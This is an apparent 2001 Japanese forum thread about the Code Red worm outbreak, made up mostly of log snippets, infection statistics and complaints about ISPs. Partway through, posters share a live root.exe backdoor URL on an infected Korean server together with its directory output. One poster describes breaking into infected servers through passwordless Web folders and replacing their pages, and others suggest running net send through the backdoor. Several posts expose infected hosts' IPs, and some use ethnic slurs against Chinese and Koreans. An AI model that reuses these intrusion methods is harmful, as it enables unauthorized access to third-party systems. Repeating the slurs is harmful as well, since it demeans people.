日本ｱﾝﾄﾞｺﾘｱがﾎﾜｲﾄとﾁｬﾝｺﾛ争いのとばっちり食らってるのか。
笑えねー

>>654
その中で*.chとカブってるのがあったら悲惨なワケだ

*.cn？

NNNはEN版だからチャイナっぽいね、でその報復がXXXと
ついでにウザイJAPとﾁｮｿｺも逝っとけ って感じ？　　（´Д｀；）

ﾔﾝはﾁﾅとｼﾞｬﾌﾟとﾁｮｿの区別がつかないに一票。

まあ日本時間で、土曜の夜に発動っていうのは、
明らかに最初からアジア狙いだったんだろうね

とりあえず黄色っぽいの狙っとけって感じか

Xばら撒いたのは明らかに英語圏の奴だろ
これに限らずindexserverのオーバーフローは
大抵OSの言語決め撃ちしてくるから、
俺がX飛ばして来た奴HTTPで見た結果は
100% 中国､日本､ｶﾝｺｯｸ だよ
英語版からX来た人居るの???

中国が、コードレッドver４作って、アメリカに報復に出たら、更に面白くなるね。
あ〜あ、中国とアメリカが核戦争したら、
間違いなく日本も滅ぶね・・・。

あああ。。。これ見りゃ一目瞭然じゃん　((((;´Д`)
やっぱアメ公こええ。。。。。
http://www.security.nl/misc/codered-stats/geodist.gif

うちの国別アクセス頻度は、ダントツで日本、続いて韓国、台湾、
アメリカ、オランダの順だった。
ちょこちょこフランス、ニュージーランドとかもあったけど

わざわざ調べてらんないから、逆引きできたIPのみだけど。

cn入れ忘れた。台湾の次ぐらい

CodeRedに汚染されている鯖のIP晒してもいいですか？

>>668
あんまり良くないです

>>668
やめなさい！と言明しときます。

晒すのは辞めます・・・

しかし５時間で７５アクセス。
index.htmlよりもアクセスが多い・・・鬱だ死のう

>>668
バックドア付きってことで、よしましょう。

CodeRed駆逐ウィルスCodeBlue作ってヨ

>>665
北京？あたりの赤丸がでかすぎて、日韓の状況がわからん

ダイアルアップで繋げて30分で30件もｷﾀｰﾖ

>>673
ちょちょっと、作ったけどどうする？

しかし、トラフィックの無駄だよなぁ・・・

>>673 そして世界中の Code Blue が君のサーバを叩きまくる、と。

おもいっきり日本のネットショップからアタック受けたので、
「感染してますよ」ってメールしたけど返事がありません。
晒したいです。

>>674
633から読み返せ

その調子じゃ、その内Code indigoとか訳わからんものまで出てくるぞ

あんまり意味ないが、
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=kr
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=cn
http://cgi.apnic.net/apnic-bin/ipv4-by-country.pl?country=tw
から来るパケット全遮断にするかな。暫く。

ぐはっ　REDに混ざってポート1024までアメ公に舐められた　(泣
フルコネクトでガリガリっとさ、、、、、ｳﾂﾀﾞ　　-＿-

感染したまま放置しているｳﾞｧｶはマジ氏ね！！！！！！！！！！！！

しかし、しみじみ述べていいですか…

今回の一連の騒ぎは私がネットワークに関する事に興味をもってから初めての
出来事です。ちょうど土日にかかったということもあり、なんとも言えないラ
イブ感を感じました。

７／２０頃から会社のサーバーに届き始めたパケットを観察し始めて以来…あ
たかも小学生時代に、カブト虫の幼虫がさなぎになり、そして成虫へと変態し
ていくさまを観察したときのような…

このたびの出来事、そしてこのスレでの皆さんとの語らいは、私のこれからの
人生にとって、忘れられないものとなるでしょう…

誰がしみじみ述べていいと言った

(･∀･)ｲｲ!!

>>682
こいつらと日本て、ほとんど重なってるわけか

>>679
こっちは某所のストリーミングサーバーから来たよ。
速い回線につないでるから余計迷惑だゴルァ！
管理者にメールしても連絡なし。
IP からプロバイダ調べて「切り離せ！」と電話しといた。

べーつーにー、画面書き変わんないしー、もーまんたーいじゃーん？
ちょっとアタックされたからってメールしてきて、マジウザーい。

というのが、世のIIS管理者の総意です。

>>679
企業のサーバは晒してもいいんじゃない？

>>685
ﾜﾗﾀ
もうネタにするしかないもんな。ここまで来たら。

ウィルス作者とIIS管理者は死刑でいいよね？

>>688
そう、ｳｻﾞｲことにね。
krやcnなんかには、10.xx.xx.xxを割当てりゃいいのに。

>>690
バックドアしかけられてそれかい。
はげしく逝ってよし！！
いや、逝く前にサーバはずしとけ。

テレホ近づくにつれてアクセス順調に増えてるな〜

>>694
192.168.0.0
あたりでいいんじゃないかな。

>>691
止めろって。
どうせ、届いたパケットみて Backdoor から DDoS エージェント
埋め込んでるヴァカとかいるだろうけど、わざわざここで入り口
晒して助長することはない。

>>697
いっそのこと127.0.0.1に統一してもらおうか。

顧客情報を抜き取ってライバル会社に売り込みましょう。

そういや、ラーメンはどうやって沈静化したのかな？

うちには *.co.jp からのアクセスは殆どこなくなりました。
プロバがOCNだとまだあるのか？

>>690
別にDoSの固定砲台になったっていいよな〜。
もってけroot.exe〜。うぜ〜。

>>698
激しく同意。とはいえ、黙ってても、
「自分でパケット吐いてる」時点で十分晒し者なんだが。

　　
　　　　で　これらのＩＰ採取できたら最初にどうやって遊ぶ？

このスレだけニュー即並に廻ってるね　　ｗ

>>703
「こーどれっど？何それ？」　が真の管理者

default.idaフォルダーのなかにcode black作って入れたら
明らかにｌｏｇが変化してきた。

>>705 トップページを 2ch に飛ばすよう仕組むとか。

>>707
管理者ゼロ名、利用者一名・・・

211.44.6.12
コーリアからきた氏ね。

もう誰でも良いから感染マシンのディレクトリ消しまくるワームばら撒いてくれ
それ位しか ほんわかIIS管理者叩き起こす手はないだろ！

>>709
DDoSで2chが使えなくって自分が不便だYo!!

>>712
いいのんか？

http://www.security.nl/misc/codered-stats/detailed-v2.html
沈静化の兆し？

でっかい赤丸、東京かと思ったらソウルだった。

>>716
そう　ル。

この寒さ・・・ここはアラスカか？

MSのサイトって大きすぎて何処見たらいいのかわかんないんだよね
これくらいは軽く言ってのけなければ IIS管理者とはいえません。

>>719
ﾜﾗﾀ

http://210.120.39.3/c/inetpub/scripts/root.exe?/c+dir
ここみてみ。

>>715
Code Red V2は、そうかも。

会社の鯖にIE6beta入れちゃったっ　　　ｴﾍ

>>721
よせ。

>>721
見ましたが何か？

>>722
Directory of c:\

2000-10-16 04:05a 0 CONFIG.BAK
2000-10-16 05:36a <DIR> Documents and Settings
2000-10-16 03:54a <DIR> down
2000-10-27 12:54p <DIR> HanGame
2000-10-17 10:56p <DIR> HNC
2000-10-16 05:14a <DIR> Inetpub
2001-08-06 06:58p <DIR> inmul
2000-10-16 03:32a <DIR> My Documents
2000-10-18 03:37p <DIR> My Music
2000-10-16 05:31a <DIR> orant
2000-10-16 03:58a <DIR> orawin95
2001-08-03 12:40p <DIR> Program Files
2000-10-16 04:12a 427 SCANDISK.LOG
2000-10-16 03:10a <DIR> WINDOWS
2000-11-06 12:54p <DIR> WINNT
2000-10-29 10:44p <DIR> WORK
2 File(s) 427 bytes
14 Dir(s) 3,986,743,296 bytes free

>>721
ここで引っかかる奴はいないっつの

立場ねぇ〜

CGI でさ、接続もとの ISP にメール送りつけるっての作れない？
それを /default.ida にマップしておけんかね？

>>729
前も書いたが止めとけ。
ゴミトラフィック発生装置になるだけ。

>>729

アクセス毎に自動で送るとプロバイダの管理者が死んじまう。

プロバイダ別にIPアドレス・アクセス時刻の一覧でも自動作成して、
あとは手作業で送れば？

>>729
メールばくだーんになっちまうからヤメレ。
訴えられるぞ。

>>721
半角板に貼ってあるのと同じですか？

>>715
感染期を終えて、backdoorが潜伏しちまうと思うと、素直に喜べんですね・・・

ある意味、名スレになってきたカモ

うちのログ見ると沈静化してるようにはとても見えんが…

明日の朝にはパート２逝きそうだね。

>>736
激しく同意！！

みんなはどうやってログとってるの？
http-access.logを見てる？
それともcgiでログとってる？

CodeRed のトラフィックで崩壊に近い状態のプロバイダ
INTERLINK は言い訳メールを顧客に３本打ってきたが、
復活しないまま日付変わりそうだな。

>>738
access_logだよ。

サーバ乗っ取られますか？

>>738
簡易ハニーポット＆たまにPacMonPro

>>458にもあるけど
http://www.eeye.com/html/advisories/coderedII.zip
XXXの逆汗リスト。解説(英語)も付いてる。読んでごらん。

>>739
Airnet.ne.jp は復活。

セキュリティホール memo 復活してる。
Code Red II 関連リンク集もあり。見に逝くべし。

>>745
を。さんきゅー。

今日一日のCodeREのLOGが2MBだよ、、
日に日に増えてる気がする。
皆さんのところも増えています？

http://www.zdnet.co.jp/news/0108/04/b_0803_11.html
ﾜﾗﾀ｡

>>747
増えてるけどそんな多くないよ。

>>748
来週末にはアキバでも手に入るらしいよ＞ソーダ

>>747

@NIFTY(旧INFOWEB)だけど、23時すこし過ぎたあたりからピタリととまった。

ユーザが寝たか潜伏したかと思ったが、まだ増えとるという話もあるのなら、
プロバ側で対策したかな？(だとしたら偉い)

倒めたやインターリンクは
ルーターのARPキャッシュfullで通信障害になったと見た

>>749
>>751
ども有難う。
何とか落ち着いてくれることを祈りましょう。

日本の超有名なビデオカードメーカーの
鯖もやられてるみたいですね。

２３時台にアクセスがあったぞ。
連絡してやるべきか・・・

>>751
自己フォローです。
減っただけで、まだ居てました。ひとまず落ち着いてはきたんだろうか？

起きたらどうなってるかなあ・・・つうわけでお寝みです。

>>754どこ？

>>754
あちですか？まさかと思ってアクセスしてみたら一部NotFound・・・

>>751
ルータがいくつかオチて、件数が減ってるだけだったらヤだな…。

Code Red買いに行ってくる。
コンビニにあるかなぁ。
http://www.zdnet.co.jp/news/0108/04/b_0803_11.html

無いよ。普通のマウンテンデューぐらいならあるかもしれんが。
まあコンビニにはきついか

某i･○データもサポートソフトのとこが回線速度遅かったけどredcoad？ISDNで1M落とすのに30分かかった(´Д｀;
あとポート137叩いてくる奴がいて鬱。

>>751
昼頃ニフティーに報告した。
最初は全く相手にされなかったので
インターリンクの話を出して、

「ユーザーが通報しているにもかかわらず
IPすら聞かないで追い払って
もしインターリンクみたいな事が起こったら
どうするおつもりですか？」

って言ったらやっと重い腰をあげた

>>762

ひどいなあ。帯域は落ちてなかったが、8/6の昼でそれでは。実際は土曜から
始まったのに・・・
私も8/5に駄目元でサポートメールを送ったが、きっと読んでないのか。

御苦労様 >>762
でも、今現在も来てる。>@nifty

みんなでCode Redのアクセス数を自慢し合おう。
俺んとこは昨日751回だぜ。

>>765
不毛だから俺はいい・・・
またあのでかい赤丸思いだしたよ

サポートの名前覚えてるから
ニフティー落ちたら騒いでやる。

っていうか、コードレッドの話をしたら
「そのような話は（ユーザーから）あがってませんが」
といってたよ。

でもこれ↓って有効だよねぇ。実行ボランティア団体とか出てきそうだよ

http://ton.2ch.net/test/read.cgi?bbs=sec&key=989706177&st=815&to=815&nofirst=true

xxx 223
NNN 10
total 233

>>769
　不毛だからやめよう。スレ荒し状態になってしまう。

これっていつ終わるの？

CodeRedにこれ以上亜種がでなかったら9月末まで。
まあ亜種は出るだろう

さあ？
>>768
　それ、何？

>>771
終わらない。インターネットはこういうものになる。

>>767

762です。ユーザから上がってなくても、サーバ運用してる部門がログを見て
気づくような気がすんだけど B-(

なんか、「メールが設定できませんとか」、「つながりませーん」の相手しかした
ことの無い部門に電話しちゃったとか・・・

それともヤッパリ、会社ごとDQNなんすかねえ・・・
個人ユーザの利用レベルだと、ダウンタイムや帯域の問題、あまり起きない
プロバイダなんだけど。

明日、沈静化してなかったら、このウン百件のログなどを証拠に送るか・・・

>>768
net send　使ったんだなきっと。
うまいこと考えたな、これなら漏れレベルでも
簡単にできる。

>>775
俺は電話しても無駄だと思ったから、最初からログ添付で
J-COMにメール送ったよ。しかも２回。今後新たな「J-COM
なのに感染野郎」が増えたらまた送るかも

プロバイダー側ではどんな対策が可能なの？
default.ida宛てでNNNN..かXXXXがパラメータなら無視とか設定できるの？

１５時から見て３００人目のお客様
61.202.82.37

>>776
最初の頃、net send やってみたけど、通らなかったよ。
なんか方法があるのかな。

>>779
IP晒しはやめなさい。CodeRedIIなんだろうから

.sgからも来た。

code redが来たら踊る人形プログラムでも作ってみようかな。

>>777

なるほど。
ときに@NIFTYだと、まずセキュリティ関係の苦情窓口はどこじゃ〜、てWebページ
で探したけど、見つからず「その他の連絡先」にWebフォームでって事に・・・推して
知るべし。

そして今日のアタック、１／３は〜ppp.infoweb.ne.jp で自分とこなんですけど〜
ま、いま@NIFTYバッシングしてどうかなるわけでもないし、明日連絡してみよ。
whoisででもadminのe-mail調べてみるかな。

>>778

・感染したサイトの管理者にメール出す。電話をかける。手紙を出す。
・感染したサイトの接続を切ってしまう。
・感染したサイトから port 80 への外部アクセスをフィルタで捨てる。
・IDSで GET /XXXXXXXXXXXX 見つけたらRSTを両側に強制発行してTCPコネクションを切る。

こんなとこ？

"GET /default.ida?XXXXXX (省略） HTTP/1.0" 200 - "-" "-"
"GET /default.ida?XXXXXX（省略） HTTP/1.0" 404 280 "-" "-"

おなじxxxパターンなのに200になるケースと404になるケースが
あるようだけど

>>780

>default.idaの名前のプログラムを持っていってもらって感染ホストの
>バックドアから入り警告のメッセージをコンソール出力する

>Code Red Worm が作成したバックドアを使用して，NET SEND する
>CGI プログラムのことですね．

こんな記事がシー研に載ってましたよ

>>778
・兎に角まず自分とこの客で Code Red 持ちの奴を特定し、遮断。
・ホストの繋がっていない IP 宛てのパケットなど、不要なトラフィックを
　なるべく根元のルータで落とす
・transparent proxy などの使用を一時的に止める
位かな？

whoisとグーグルで調べて中国系の企業に直接
管理者に教えてあげましたよ。
○○○○○ELECTRONICS

>>787
　なるほど、よく分かった。ありがとう。
バックドア使って相手のCMD.EXEからnet sendするわけか。
　いい手だけど、バックドア使うのはやだしなあ。

>>786
200 : OK
400 : リクエストの文法エラー
404 : URLが見つからない
408 : タイムアウト

以上4つのケースが確認されてるみたいよ

CodeRED、コード部分だけのリクエストに変わりました。
頻度が多い、、、なんだこりゃ。一分間に100発程度で連続です。
ひぃ〜〜〜〜〜〜、明日はどうなるんじゃ！

207.33.111.32 - - [07/Aug/2001:00:30:21 +0900] "HEAD /%63%67%69%2d%62%69%6e/%6d%61%69%6c%6c%69%73%74%2e%70%6c HTTP/1.0" 404 0

>>792
しかもメソッドがHEADだね。面白くなってまいりました

でも最後に "Mozilla/4.7 [en] (Win95; U)"って残ってんなぁ。
ﾀﾞﾚｶが悪さしてるとみたが。

>>792
変臭が出るとは予想してたがマジか。ていうか、変種というより別モンではないか？
IISだけがターゲットじゃないかも・・・

>>792
今度の新種はがらっと変わったね。リクエストヘッダは取ってる？
特に、Content-lengthは見れる？

>>791 Thanks
でもApache使っていて200があるのは、どうしてだ？

つーか別物だね

>>752
某電力系プロバイダは、ルーティングの設定が元々おかしくて、
CodeRed の攻撃パケットの一部が宛先不明パケットとして
変なループ作って輻輳を起こしていた。
夕方電話で指摘して解消に向かった。これまではそういうパケット
は TTL が 0 になるまでぐるぐるして捨てられてて気が
つかなかったらしい（笑）

>>751
>>762
>>763
>>764
>>767
>>775
>>784
ニフでインターネットを理解できる人間は 10人ぐらいしかいません…
ましてや、サポセンにいる社員なんて「インターネットって何？」っていうDQNだらけッス。

スマ〜ン！(涙

よく考えたら、これじゃバッファ溢れんと思うが

>>801
わはははははは

>>797
君の認識がよく分からんが、君のところのサーバーは、
200（OK）を出さないのかね？

>>801
みなさんじっくり見てから発言しましょうね。
もちろん僕も勘違いしましたが

>>800
内部っすか？じゃー、告発はいーから、とりあえず社内でなんとか
話まわしてチョ！！！！！！！！！！！（以下百万字） v(ToT)v

>>792
おいおい、デコードしてみろや。ぜんぜん違うよ。
HEAD /cgi-bin/maillist.pl HTTP/1.0

つまり、ネタでしたか。

794の姉でございます。この度は794が大変ご迷惑をかけています。
実はあの時間 794は http://207.33.111.32 にて自前のマシンを
ポートチェックをしていまして、そのLogに驚いたものだと思います。
いきなりの驚きのため、ただ今寝込んでしまいましたが、朝には叱咤して
おきますので、皆様 何卒この場はお静まり願えることを794に成り代わり
お願い申し上げます。

>>805
ん？書いたでしょ？
インターネットなんか知らないって！

だから「スマン」なわけ。(泣

ドンマイ、こっちもちゃんと確認しなかった。
つーか面白い亜種出ないかな〜とか考えてたんで、つい（ｗ

CodeRedには笑った！ってコピペもできそうだな・・・
しかしこれってニュース板とかでもあんまり騒がれてないのが意外

>>809
あうううぅぅぅぅぅぅぅ////(ToT)/
も、いい。寝ちゃうから・・・しくしく・・・・

バックドアでnet sendするのは罪になるのかな？
route delete で強制的に止めるのはやっぱまずいよね。

結構沈静化してきた・・・？
�Uにも潜伏期間ってあるの？

昔、niftyのサポートの面接受けに行ったけど、
ちょっと偉そうな人が「どのようなキャリアプランをお考えで？」
って聞いてきた。プロバイダーのサポートでキャリアプランもクソも無いだろ
って思った。

>>814
ｷｬﾘｱﾌﾟﾗﾝ ﾜﾗﾀ

IIは24時間置きにスリープ。中国語環境だったら48時間だけど

ログで驚いたといえば、
xxx.xxx.xxx.xxx - 80 GET /x.ida AAAAAAAAAAAAAAAAA...
というのを見つけて、すわっ新種発生か！？？と驚いたよ。

念の為、とか思って過去ログのどっかにあったチェッカーを
走らせたのを忘れていて笑ったよ。

ﾁｬﾝｺﾛはこき使うという事か・・・
台湾の人が巻き込まれているのが不埒でならねぇ

>>817
　ピーッ、Red Card

なんだこりゃ

202.247.109.242 - - [07/Aug/2001:01:15:52 +0900] "XXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ?????? HTTP/1.0" 400 178

GETもHEADもついていない

>>819
わりとｶﾞｲｼｭﾂ

>>167
>>252-254

うおー。net sendカコイイ！
その手があったねー。
ダイアルアップでひっかかってるような奴には通るだろねー。
あのダイアログ知らないと、ビビるんだよね〜（藁

>>819
たぶんそれは、自分のＤＮＡをコピーしそこなった突然変異とおもわれ
種無しなのでやられても赤ちゃんは生まれないよ。ちょっとだけ我慢し
て目をつぶっていればすぐ終わるから・・・

>>821
もうこの事態下では絶対止めろとは言いにくくなっているのだが、
一応、不正な方法でのアクセスには違いないので、ビビらすような
メッセージ送るのは止めたほうが無難だな。

メッセージ出すんだったら、素直に警告メッセージにするのが無難だろうな

net send するぐらいなら net stop してしまえ。

http://www.security.nl/misc/codered-stats/
が変わった。

Code Red II のほうは東アジア爆弾が描かれてないのは、
観測地点に届かないからみたいだね。

shutdownは標準では入ってないんだよね。

そのうちあの赤丸が地図全部を覆ったりして。

IP: 61.208.93.99
DNS: www.ajapa.ne.jp

ここからHTTP port proveされまくってます。
反撃したいんですけど、どうしたらいいですか？

>>829
パケットフィルタで、そこからのすべての TCP 接続要求を
無視しておけ。

>>823
外部からnet sendするのは別に不正侵入じゃないよね。
netbiosさえ通ればメッセージ送れるわけで。
ダイアルアップ野郎には有効かと。

>>830
反撃だから・・・ちょっと違うかも
（というレスも・・・ちょっと板違うかも

バックドア使わないなら問題ないだろう。
通るのかな。

>>831
そうだな。Backdoor を突かずにできることをやらんとな。
とはいうものの、ここまで広がったら完全に焼け石に水
なのだが...
とにかくプロバイダにガンガン指摘して Code Red 持ちの
ホストを締め出してもらうしかないと思う。

> このサーバーは、Windows 95 で実行されています。
> このページは、Microsoft の パーソナル Web サーバー で提供されています。
別のとこでも出てたけど、俺んとこにきた奴のページのぞいたらこんなのが…
感染するのは純粋なIISだけじゃないの? これじゃ絶滅しないよ絶対…

>>829
whoisで責任者調べて責任者にメールすれば？
　それでもだめならOCN下のようだからOCNにメール。

>>835
絶滅もなにも、友人で自前サーバー持ち、今回のこの騒ぎを
全然知らないでいるくらいだから、ほかにもそういう奴はごまんといる。
当分はなくならないね。

1人5件まで、バックドア使って消して良しっていうルールありにしてくれ

IP: 211.2.19.121
DNS: fkok026n057.ppp.infoweb.ne.jp

IP: 24.19.94.99
DNS: c1776466-a.grapid1.mi.home.com

IP: 24.190.66.123
DNS: ool-18be427b.dyn.optonline.net

IP: 202.224.197.131
DNS: sirius.tenchi.ne.jp

いかにもPPPな奴晒してもあんま意味無し。

ウザイ

IP晒すアホは消えんな、寝よ

210.197.80.141

>>835
IISに移行したけど、メッセージ書き換えるのを忘れているとかじゃないかな？
head送ってみたら？

みなさん産休です

いい加減に気付けよ、佐賀の○○学園! と思って検索かけたら
> ＜セクハラ＞佐賀短大助教授を停職処分　女子大生に言葉で
こんなとこかぁ…

暇なのでやってみよう。CodeREDｳｻﾞｲので、まずlogからIPひらってIISの稼働を見る。
くたばってなかったら、おもむろにエクスプローラから、Webフォルダーを開き、追加する。http://アホなIPで馬鹿管理者がパスワードも無しであればWebルートへ入れる。
default.htmとかindex.htm,index.html等を作りコピーして置く。topページで簡単に置ける。
It is committed by CodeRED. Please do not send a packet to me. Management is random. Please intercept a power supply.
ここへlogを張りつける。
よめ！
http://www.eeye.com/html/Research/Tools/codered.html
ってな感じ。
これってクラックかい？　しょうがないじゃん。。。啓蒙活動としてとってほしいな。
しかし面白いくらい入れるぞ。10%以上の確率だ。

CodeRedが人間にも感染したらしい。

自分のサイトって自分では見ないよね。

>>850
ほんとにやっちまっていいのかね。それなら手動で
いちいちHTML置いたりしないで、うちにリクエスト送ってきた
鯖は、全部自動で応急処置しちまうんだが。

>>850
ほんとにアホな奴が管理者やってるんだよね〜困るＹＯ！。
CodeREDｳｻﾞｲ、本当に氏んでくれ。

書き換えるのは器物破損になるね。
せいぜいnet sendぐらいにしておくんだね。

>>853
足つくし、よしとけって。

ふ〜む、さっきから聞いてはいたが、net sendってのは
なんだい？NT系のコマンド？

>>857
u*nixでいう、writeコマンドですね。画面にメッセージ出す。

NET SEND {名前 | * | /DOMAIN[:名前] | /USERS} メッセージ

NET SEND は、ネットワーク上のほかのユーザー、コンピュータ、または
メッセージ宛先名にメッセージを送信します。メッセージを受信するには、
Messenger サービスが開始されていなければなりません。

メッセージを送信できるのは、ネットワーク上でアクティブな名前に対して
だけです。ユーザー名にメッセージを送信する場合、そのユーザーがメッセージ
を受信するためには、ログオンして Messenger サービスが開始されていなければ
なりません。

名前
メッセージを送信するユーザー名、コンピュータ名、またはメッセージ宛先名
を指定します。名前が空白文字を含むコンピュータ名の場合、エイリアスは
二重引用符 (" ") で囲みます。
*
グループ内のすべての名前に対してメッセージを送信します。
/DOMAIN[:名前]
ワークグループまたはドメイン内のすべての名前に対してメッセージを送信
します。名前が指定されている場合は、指定されたドメインまたはワーク
グループ内のすべての名前に対してメッセージを送信します。
/USERS
サーバーに接続しているすべてのユーザーに対してメッセージを送信します。
メッセージ
メッセージとして送信するテキストを指定します。

なるほどね。確かに応急処置も訴えられたらまずいしな・・・
NT使ってれば、そのnet sendを自動で返信してやる
スクリプトを書くんだが。詳細がわからんことには書けん

>>860
net send <計算機名> <メッセージ> を自分のCGIで呼べばよいが、
NETBIOSが届くこと前提。やってみたことないからわからん。

>>861
自己レスだが、ふつうはルータでNETBIOSちょんぎっているから、
PPP常時接続野郎にしか通用しないかも。

いや、Win98なんでね。しかも鯖立て禁止のJ-COMだから、
ハニーポット書くことぐらいしかできん。つーかNetBIOS使う
net ***系のコマンドか・・・ちょっと単純にソケットで送るのは
厳しそうだ（俺には）
つーことで素直に寝るよ。明日も仕事だし

いやぁ、既に流れてしまってたりして慌てるが、一応管理者判ったんで
メールしてごめんなしてきた。topページからいきなりジャンプするページだったんで
普通じゃ気づかないのかなと思ってさ。
>>862
しかしね、そのNETBIOSちょんぎってないのが実に多いのよ、実際。
ポート塞いでてもFrontPageとかで直接編集できたりしてさ。
Administrator、パスワード無しって感じだわ。

http://slashdot.jp/comments.pl?sid=01/08/05/0441253&cid=126

>>864

メールでナシがつくなら安心。

>しかしね、そのNETBIOSちょんぎってないのが実に多いのよ、実際。
>ポート塞いでてもFrontPageとかで直接編集できたりしてさ。
>Administrator、パスワード無しって感じだわ。

え〜〜。
デフォのほったらかしでなくて、サーバで立ててるつもりでそれじゃあ、絶句もんだよなあ。

この騒動の諸悪の根源、そんなとこばっかりなんか・・・

＃反動で変な法規制ができたりしないこと望む！！

>>865
あらら、早いっすね。
手動でnet send叩いたら、自分のFWではじかれた→NETBIOS (藁

自分のPCでIISが動いてるかどうか分かる方法ってあるんですか？
自分で入れた覚えはないんですが、何かソフトを入れた時に
一緒に入ることもあるような書き方なんで＜MSサイト

http://localhost
でどうかな。

>>869
クリックするとNetscape.co.jpで「localhost」を検索した結果が出るんですが・・・。
ネスケ入れてないのに。

>>870

じゃ、http://127.0.0.1 でど〜ぞ。

>>871
やってみました。「表示するページなし」になったんで大丈夫ってことですかね。

それはlocalhostで繋がらなかったから自動検索に行ったんだろう。
IEのツール、オプション、詳細設定で、アドレスバーからの検索
で検索する設定になっていると思われ。

それなら大丈夫ってことじゃない？
念のためにシマンテックがだ出してるCodeRed感染チェッカ？みたいので確認するともっといい。

>>872

おっけー。
あー、平和な気がする(まだBlackICEがぴこぴこ言うとるが)

皆さんありがとうございました。
共有切ってたはずのドライブの共有がいつの間にかONになってたんで
びくびくしてました（笑
ウイルスチェックでも何も出てこないからたぶん何事もなかったんだろうと思います。

>>868
タスクマネージャのプロセスタブを見て、Inetinfo.exeがあればIISが動いてる。
なければ動いていない。

(8/6)新ウイルス「コートﾞ・レットﾞ」、日本で数千台感染・ＩＰＡ推測
　サーバーに感染する新種ウイルス「コード・レッド」に、6日までに日本国内で数千台のサーバーが感染したとの見方を、経済産業省の外郭団体の情報処理振興事業協会（ＩＰＡ）が明らかにした。サーバーへのハッカーの不正侵入を助ける悪質な機能をもった変種が出回っていることも分かった。
　コード・レッドの感染行動は1日から全世界で始まりＩＰＡへの国内の感染報告は6日まで3件だが、「様々な情報を総合すると国内で数千台のサーバーが感染している可能性が高い」（セキュリティセンター）という。

　変種の「コード・レッド２」が感染したサーバーのプログラムには「バックドア」と呼ばれるセキュリティー上の弱点が生じる。ハッカーはこの弱点を悪用してホームページ経由で簡単にサーバーに侵入し、サイトを改ざんしたり企業の内部情報を盗み出すことが可能になるという。

　「２」が感染したサーバーは基本ソフト（ＯＳ）を再インストール（組み込み）しなければならず、回復にも時間がかかるという。従来のコード・レッドはマイクロソフトのＯＳ「ウィンドウズＮＴ」「同２０００」を搭載したサイト用サーバーに感染する。感染した場合、サーバーの電源を切りＯＳのプログラムの一部欠陥を修正すれば良いとされていた。
http://it.nikkei.co.jp/it/sp9/sp9Ch.cfm?id=20010806dahi266606

なんか思いっきり乗り遅れてる気がするけど、うちのノートン何も言わないだけど…
普通はくるものなの？

俺の使ってるCATVから今更注意を促すメールが届いた…遅すぎです(;´Д｀)

色んな情報が集まる2chが一番速いと思うぜ。マジで。
ネタ、嘘もあるけど慣れれば最高です輪。
ニュース系のweb、ワクチンメーカー、全て遅すぎ。
逝けって言いたくなる。

>>879
うちのノートンも静かだけど、イベントログを見ると来てるみたい

>>880
来るだけマシです。。。

>>882
えっそうなの？警告にすら表示なしなんだけど…ちゃんとアップデートはしてるのに

ここから　XXXXがきた　siamitmall.com
http://siamitmall.com
なにジン？
あと、左上のタワーは怪しいね
確信犯かな？オレみたい（ｗ

これにかかったらどんな症状が出るんだ？

>>885
発熱（40℃前後）、激しい下痢、嘔吐など

Code redIIはバックドアを作るところまで
基本的にAdmin権限取られるのでやろうと思えば何でも出来る

>>878
感染しちゃったら、やっぱり
>「２」が感染したサーバーは基本ソフト（ＯＳ）を再インストール
>（組み込み）しなければならず、回復にも時間がかかるという。
しないといけないのかな？root.exeつぶしだけじゃ危険？
もちろん亜種発生→root.exeの名前が変わるってことはありえるけど

またまた新型コードレッドの噂が流れてますが？

冷却ファンを停止するらしいね

>>890 マジ？

なーんか dns.***.tw ってとこから来たんだけどおっかねー。

481 名前：まじかよ・・・ 投稿日：2001/08/07(火) 06:58 ID:8SLJMgNE
「Hunmer Red」って新種のウィルスか？
今朝配信受けたけど、Pc-Cillinの検出Passしやがった。
「Good Luck」っていうコメントが出た！！
今のところ症状無し。

めちゃくちゃ基礎的なことなんですが・・・ログってどうやって見るんですか？

フォースを使うのだよルークス!

WINNT\system32\LogFiles\W3SVC1

８時５０分からアクセスなくなったんだけどこれは一体...

出勤したんだよ。

>>803
797じゃないけど Apache で default.ida なんかなくても
200 を返すのは正常なの？

リクエストが - だけのが来てるんだけどこれも Code Red かな。
あるサイトから 100 件ほど XXXX でアクセスがあったあとに
ちょこちょことあったりする。あんまり数は多くないけど。

こういう時は、変な噂も流れやすいから注意しようや。

http://www.jpix.co.jp/Japanese/Japanese%20Html/J_index.htm

JPIXのトラヒック。
この赤いのって・・・。

900超えたけどどうする？
もう一つの Code Red スレと多少方向性違うので
Part II 立ててもいいと思うのだが。

>>903
スレ立て賛成

>>903
ｻﾝｾｰｲ.

>>900
もしかしてサーバーの応答コードは408？

新スレ立てました
「コードレッド (Code Red) 逝ってヨシ」
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997150588

203.246.48.82
開けてみたら韓国のベンチャー企業、しかもOSを取り扱ってる。
韓国人の友達を通して「ふざけんな」とメールして貰った。

203.246.48.82
開けてみたら韓国のベンチャー企業、しかもOSを取り扱ってる。
韓国人の友達を通して「ふざけんな」とメールして貰った。

>>908-909
>>907は読んだ？